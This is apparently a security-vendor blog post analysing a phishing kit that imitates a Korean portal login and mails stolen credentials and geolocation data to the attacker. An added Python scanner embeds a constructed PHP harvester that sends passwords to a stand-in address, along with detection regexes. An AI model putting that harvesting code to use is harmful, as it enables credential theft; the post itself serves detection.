AhnLab Security intelligence Center (ASEC) has recently analyzed a phishing case where a phishing page was disguised as the login page of a well-known Korean portal website. ASEC has since collected some information on the threat actor.
The fake login page, which is believed to have been distributed as hyperlinks attached to phishing emails, was found to be very similar to the login page of the well-known portal site. In fact, it is difficult to tell at a glance that this is a phishing page.
Entering login credentials in the phishing page results in the information being sent to the C2 server set by the attacker as shown below.
AhnLab was able to obtain the code that runs on the phishing page server while analyzing the threat actor’s domain. It also obtained multiple PHP scripts that dictate how the login credentials sent to the threat actor via the phishing page are processed. This post examines how the user information stolen by the threat actor is processed.
1. Collecting login credentials and client information included in the packet
From the packet received from the phishing page through the POST method, the threat actor collects the email and password entered by the user and uses a regular expression on the User-Agent to determine the OS and browser environment of the client that sent the packet.
2. Collecting additional information using the source IP information included in the packet
The threat actor uses the source IP address included in the packet to query the geoPlugin site and additionally obtain the country, region, and city that the IP address belongs to. The geoPlugin website was identified as a legitimate plugin-type service that returns information on the submitted IP addresses in JSON format, but as seen in this phishing case, it can be abused by threat actors.
3. Creating an email based on the collected information and sending it to the threat actor’s email address
Based on the information collected in steps 1 and 2 above, the threat actor builds the $message variable as shown below. This variable contains the following information collected through phishing: login credentials (email and password), IP address, country, region and city, and the client’s browser environment and OS information.
Multiple email addresses receiving these emails (presumably belonging to the threat actor) were identified during the analysis, most of them Vietnamese.
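The three steps above describe a recognisable pattern in a credential-harvesting PHP handler: read a password from $_POST, read the visitor's IP address and User-Agent from $_SERVER, look the IP up on geoPlugin, and hand the assembled $message to mail(). A defender who administers or cleans up web hosting can look for exactly that combination. The following scanner is an added example written for this post; it is not code from the phishing kit or from ASEC. The PHP samples embedded in it are constructed to mimic the behaviour described above (not the real kit), and the indicator names and the verdict rule are assumptions chosen for illustration.

```python
import re
import sys
from pathlib import Path

# Constructed sample modelled on the handler described in the post (steps 1-3):
# credentials from POST, client IP and User-Agent from $_SERVER, geoPlugin lookup,
# and exfiltration of the assembled $message via mail(). This is NOT the real kit.
SUSPICIOUS_PHP = r'''<?php
$email = $_POST['email'];
$pass  = $_POST['password'];
$ip    = $_SERVER['REMOTE_ADDR'];
$ua    = $_SERVER['HTTP_USER_AGENT'];
$geo   = json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip=".$ip), true);
$message = "Email: ".$email."\nPass: ".$pass."\nIP: ".$ip."\nUA: ".$ua;
mail("collector@example.invalid", "Result", $message);
?>'''

# Constructed benign contact form: it also calls mail(), but never touches a
# password field, the client IP, or a geolocation service.
BENIGN_PHP = r'''<?php
$name = htmlspecialchars($_POST['name']);
$msg  = htmlspecialchars($_POST['message']);
mail("webmaster@example.invalid", "Feedback", "From ".$name.": ".$msg);
?>'''

# Indicator names are our own labels, one per behaviour described in the post.
INDICATORS = {
    "post_credentials": re.compile(r"\$_POST\[\s*['\"](?:pass|password|pw|pwd|passwd)['\"]\s*\]", re.I),
    "client_ip":        re.compile(r"\$_SERVER\[\s*['\"](?:REMOTE_ADDR|HTTP_X_FORWARDED_FOR)['\"]\s*\]"),
    "user_agent":       re.compile(r"HTTP_USER_AGENT"),
    "geoplugin_lookup": re.compile(r"geoplugin\.net", re.I),
    "mail_call":        re.compile(r"\bmail\s*\("),
}


def scan_php(source: str) -> dict:
    """Return a mapping indicator -> True/False for one PHP source text."""
    return {name: bool(rx.search(source)) for name, rx in INDICATORS.items()}


def is_suspicious(hits: dict) -> bool:
    """Verdict rule (an assumption for this example): a password read from POST
    combined with any exfiltration or victim-profiling behaviour is flagged.
    A lone mail() call, as in an ordinary contact form, is not enough."""
    profiling_or_exfil = hits["mail_call"] or hits["geoplugin_lookup"] or hits["client_ip"]
    return hits["post_credentials"] and profiling_or_exfil


def scan_tree(root: str) -> list:
    """Walk a directory and return (path, hits) for every flagged .php file."""
    flagged = []
    for path in Path(root).rglob("*.php"):
        try:
            hits = scan_php(path.read_text(errors="replace"))
        except OSError:
            continue
        if is_suspicious(hits):
            flagged.append((str(path), hits))
    return flagged


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Usage: python scan_kits.py /var/www
        for path, hits in scan_tree(sys.argv[1]):
            matched = ", ".join(k for k, v in hits.items() if v)
            print(f"{path}: {matched}")
    else:
        # No directory given: demonstrate on the constructed samples.
        print("sample kit  ->", is_suspicious(scan_php(SUSPICIOUS_PHP)))
        print("contact form->", is_suspicious(scan_php(BENIGN_PHP)))
```

The verdict rule deliberately requires a password field in the POST data before any other indicator counts, because mail() and IP logging are common in legitimate PHP. Obfuscated kits (base64-encoded strings, eval) will evade these plain regexes; treat a hit as a lead for manual review, not as proof on its own.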
This case is a good example of how login credentials obtained through phishing attacks are transmitted to the threat actor. Stolen credentials of this kind are at risk of being used for further malicious activity. Users should therefore take extra caution with login pages linked from emails sent by unknown sources, and periodically review and update their account credentials.
87cf92cb5ff0fc445fb05dfc7321bd3e : Phishing/HTML.FakeNaver.SC196455
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.